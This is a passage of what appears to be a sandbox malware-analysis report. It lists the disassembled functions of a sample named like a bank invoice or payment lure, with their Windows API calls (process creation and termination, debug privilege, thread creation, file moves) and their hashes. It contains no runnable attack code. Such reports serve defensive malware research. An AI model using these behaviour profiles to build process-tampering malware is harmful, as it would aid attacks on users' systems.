                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 694e9c6916c7a448efaa195a3ea674a0b6eb72cc2d44308848c04faf8eed026c
                    • Instruction ID: ffc4f60a85510c22d87aea4cf3cc4b477e8a11d0cf8d33941ee549567a630f03
                    • Opcode Fuzzy Hash: 694e9c6916c7a448efaa195a3ea674a0b6eb72cc2d44308848c04faf8eed026c
                    • Instruction Fuzzy Hash: 1971C530504209DFCF219F64CC80AFB7BB6FF49358F2452A9EE59B61A5D7318841EB61
                    APIs
                    • _memset.LIBCMT ref: 00EFF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EFFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EFFD90
                    • CloseHandle.KERNEL32(?), ref: 00EFFDBF
                    • CloseHandle.KERNEL32(?), ref: 00EFFE36
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: 92040cb355e80aee7ec03be090153fbbd86830a09ef6ad5fbc51f3d26f59d537
                    • Instruction ID: 831285150a81f5312bb3ceebb1194a4331fef9db3f2ffa4c7b436364e2b20616
                    • Opcode Fuzzy Hash: 92040cb355e80aee7ec03be090153fbbd86830a09ef6ad5fbc51f3d26f59d537
                    • Instruction Fuzzy Hash: 52E1C3316043449FCB14EF24C891B7ABBE0BF89354F14946DF999AB2A2DB31EC45CB52
                    APIs
                      • Part of subcall function 00E81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E82036,?,00000000,?,?,?,?,00E816CB,00000000,?), ref: 00E81B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E820D3
                    • KillTimer.USER32(-00000001,?,?,?,?,00E816CB,00000000,?,?,00E81AE2,?,?), ref: 00E8216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00EBBEF6
                    • DeleteObject.GDI32(00000000), ref: 00EBBF6C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 2402799130-0
                    • Opcode ID: 06f5a44f93c4fe6e367aa1368a30ee1359b3f832795bc9a6c140f9c493f339e8
                    • Instruction ID: 5f254e1f01d185b150094696bfb153aed2646903ae9ac48cd3387c63b2a3de51
                    • Opcode Fuzzy Hash: 06f5a44f93c4fe6e367aa1368a30ee1359b3f832795bc9a6c140f9c493f339e8
                    • Instruction Fuzzy Hash: 3761AF34200614DFDB35AF14DD48B7AB7F1FF52319F10652CE64AAA9A0C771A881EF51
                    APIs
                      • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EE38D3,?), ref: 00EE48C7
                      • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EE38D3,?), ref: 00EE48E0
                      • Part of subcall function 00EE4CD3: GetFileAttributesW.KERNEL32(?,00EE3947), ref: 00EE4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 00EE4FE2
                    • _wcscmp.LIBCMT ref: 00EE4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 00EE5017
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: 6787b6874abca86461c07841da32e8ae0dbe339a5e81d6956d047d2621079a13
                    • Instruction ID: 13dee2f42e0769e3e259bbb5068b3fcb2a9259feb29fd3b4d304b41e6f50ab47
                    • Opcode Fuzzy Hash: 6787b6874abca86461c07841da32e8ae0dbe339a5e81d6956d047d2621079a13
                    • Instruction Fuzzy Hash: 865176B21087899BC724EB60C8819DFB3DCAF85344F10592EF289E7191EF74E588C766
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F0896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 4c1af0de1e838034b5b2311191a6802fcd9bd7e5d1fcc4084a1f73a1b03d24f8
                    • Instruction ID: f8e39bd9db083cd8f2d03b73e4e05505a11673125ca9f5757fe6ae628859adce
                    • Opcode Fuzzy Hash: 4c1af0de1e838034b5b2311191a6802fcd9bd7e5d1fcc4084a1f73a1b03d24f8
                    • Instruction Fuzzy Hash: 3251D630A00308BFDF309F28CC85BA97BA4BB157A0F504116F995E65E1DF75A986BB41
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EBC547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EBC569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EBC581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EBC59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EBC5C0
                    • DestroyCursor.USER32(00000000), ref: 00EBC5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EBC5EC
                    • DestroyCursor.USER32(?), ref: 00EBC5FB
                      • Part of subcall function 00F0A71E: DeleteObject.GDI32(00000000), ref: 00F0A757
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2975913752-0
                    • Opcode ID: f8f8dd18289de30ec3e06fd72bc1c89c41aa6c19fe51ffe3fc9af6ac72f91764
                    • Instruction ID: 870ac3065db62c1536582af22642886a4ffbbf92c980eaf6177aeb8aed46ada8
                    • Opcode Fuzzy Hash: f8f8dd18289de30ec3e06fd72bc1c89c41aa6c19fe51ffe3fc9af6ac72f91764
                    • Instruction Fuzzy Hash: CB515974601209AFDB20EF24CC45FAA77E5FB59714F205528FA0AE76A0DB70ED90EB50
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E0C
                    • RtlAllocateHeap.NTDLL(00000000,?,00ED8A84), ref: 00ED8E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00ED8A84,00000B00,?,?), ref: 00ED8E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E30
                    • DuplicateHandle.KERNEL32(00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00ED8A84,00000B00,?,?), ref: 00ED8E43
                    • GetCurrentProcess.KERNEL32(00ED8A84,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E4B
                    • DuplicateHandle.KERNEL32(00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E4E
                    • CreateThread.KERNEL32(00000000,00000000,00ED8E74,00000000,00000000,00000000), ref: 00ED8E68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                    • String ID:
                    • API String ID: 1422014791-0
                    • Opcode ID: 5f8751f5abf6ca0cdd07dae7ede4894ed197da01f0900537d109e060d47de526
                    • Instruction ID: 4f24d50568265250e11f1c831c70a44361a57097509d268a5f0854322ed8e765
                    • Opcode Fuzzy Hash: 5f8751f5abf6ca0cdd07dae7ede4894ed197da01f0900537d109e060d47de526
                    • Instruction Fuzzy Hash: 6201A4B5240308FFE620ABA5DC49F6B3BACFB89711F004421FA05DB6A1CA7098049A20
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-625585964
                    • Opcode ID: e95484bdc0ab172880ab38f4c03bd2801a70a62d265a98e875d749571fdf7792
                    • Instruction ID: f2e949e68bace125e4eb3edeb9858172a41295ede709dfc1a0a9f23206e3093f
                    • Opcode Fuzzy Hash: e95484bdc0ab172880ab38f4c03bd2801a70a62d265a98e875d749571fdf7792
                    • Instruction Fuzzy Hash: C791DE70A00219ABDF24DFA5C884FAEB7B8EF85314F109059F655FB282D7709905CFA0
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F07093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F070A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F070C1
                    • _wcscat.LIBCMT ref: 00F0711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F07133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F07161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: e13c337afa03cf3b8c74932264f0acb85ffcd8f11a37628fc18a1e628bbeb600
                    • Instruction ID: c467b74d2ebf6b4db158310c3378800048563b7f67c9602b5b669668110ff6a1
                    • Opcode Fuzzy Hash: e13c337afa03cf3b8c74932264f0acb85ffcd8f11a37628fc18a1e628bbeb600
                    • Instruction Fuzzy Hash: F6417271D04308ABDB219F64CC85BEA77E8EF08360F10456AF944E71D1D772AD85AB50
                    APIs
                      • Part of subcall function 00EE3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00EE3EB6
                      • Part of subcall function 00EE3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00EE3EC4
                      • Part of subcall function 00EE3E91: CloseHandle.KERNEL32(00000000), ref: 00EE3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EFECB8
                    • GetLastError.KERNEL32 ref: 00EFECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EFECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EFED77
                    • GetLastError.KERNEL32(00000000), ref: 00EFED82
                    • CloseHandle.KERNEL32(00000000), ref: 00EFEDB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: 7aa78aab5e240e71f83c4269571631aa4fcd5f5ee8c0f7a521aa9b5ecaa88754
                    • Instruction ID: df4deeed874a65b5c4c5d29a094734289ec4756dfe1e9b5b3a0265da059581f4
                    • Opcode Fuzzy Hash: 7aa78aab5e240e71f83c4269571631aa4fcd5f5ee8c0f7a521aa9b5ecaa88754
                    • Instruction Fuzzy Hash: DF41BD712002049FDB24EF24CC95F7EB7E1AF80714F189459FA46AB3D2DB75A805CB92
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 00EE32C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: 4b5d67796ac8dffed2866b531ded0c1b5b64f4496b00878360f770a1e8b1d85e
                    • Instruction ID: e9c40a3c2435b96a2a9c19717544262a1bd4cc96831520e89aff55018be3a03e
                    • Opcode Fuzzy Hash: 4b5d67796ac8dffed2866b531ded0c1b5b64f4496b00878360f770a1e8b1d85e
                    • Instruction Fuzzy Hash: DB112B316093CEBAD7015A77DC46CABB3DCDF1D374F20102AFA40B7191D665EB4055A6
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00EF8BEC
                    • CoInitialize.OLE32(00000000), ref: 00EF8C19
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00EF8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EF8E50
                    • CoGetObject.OLE32(?,00000000,00F12C0C,?), ref: 00EF8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 00EF8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EF8F3A
                    • VariantClear.OLEAUT32(?), ref: 00EF8F4A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
                    • String ID:
                    • API String ID: 2437601815-0
                    • Opcode ID: 5ef7931747b9911e79d6aadfc9f4caad8c99011e6fb3f3b1bcfcd66075972180
                    • Instruction ID: a1f32b113c3015fc1cc2dbfa51d8efdf878eb66317f0e5a565e5073ecdad4fec
                    • Opcode Fuzzy Hash: 5ef7931747b9911e79d6aadfc9f4caad8c99011e6fb3f3b1bcfcd66075972180
                    • Instruction Fuzzy Hash: 46C13471608309AFD700EF64C98496BB7E9FF88348F00596DF689AB251DB31ED05CB52
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EE454E
                    • LoadStringW.USER32(00000000), ref: 00EE4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EE456B
                    • LoadStringW.USER32(00000000), ref: 00EE4572
                    • _wprintf.LIBCMT ref: 00EE4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EE45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 00EE4593
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: 6aa036a2f97a98e01e08f383e9b3eeb94e75e1d2523cf1847d57fefc6d027a10
                    • Instruction ID: 3817c887d65899398ca6ceabd1fbd5e33c3f380249710500d72d49bbd2fd6f21
                    • Opcode Fuzzy Hash: 6aa036a2f97a98e01e08f383e9b3eeb94e75e1d2523cf1847d57fefc6d027a10
                    • Instruction Fuzzy Hash: A70162F290020CBFE720E7A0DD89EE7776CE708301F4005A5BB45E2051EA759E899B71
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00E82ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000,000000FF), ref: 00E82B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00EBC46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00EBC4D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: 12428009f0147b89f7847d5eb87fcbec29bf612e3e595e579b0ccb3beddff3f7
                    • Instruction ID: f99618c648183ee913494fd7f6ab0db29e1d3ea2db9ac1d29c76f09bd6992b5b
                    • Opcode Fuzzy Hash: 12428009f0147b89f7847d5eb87fcbec29bf612e3e595e579b0ccb3beddff3f7
                    • Instruction Fuzzy Hash: F4416E34208680AEC73DAB28CC9C7FB7B92FF46308F24A45DE25FB6560C6359845E711
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EE737F
                      • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                      • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EE73B6
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00EE73D2
                    • _memmove.LIBCMT ref: 00EE7420
                    • _memmove.LIBCMT ref: 00EE743D
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EE7461
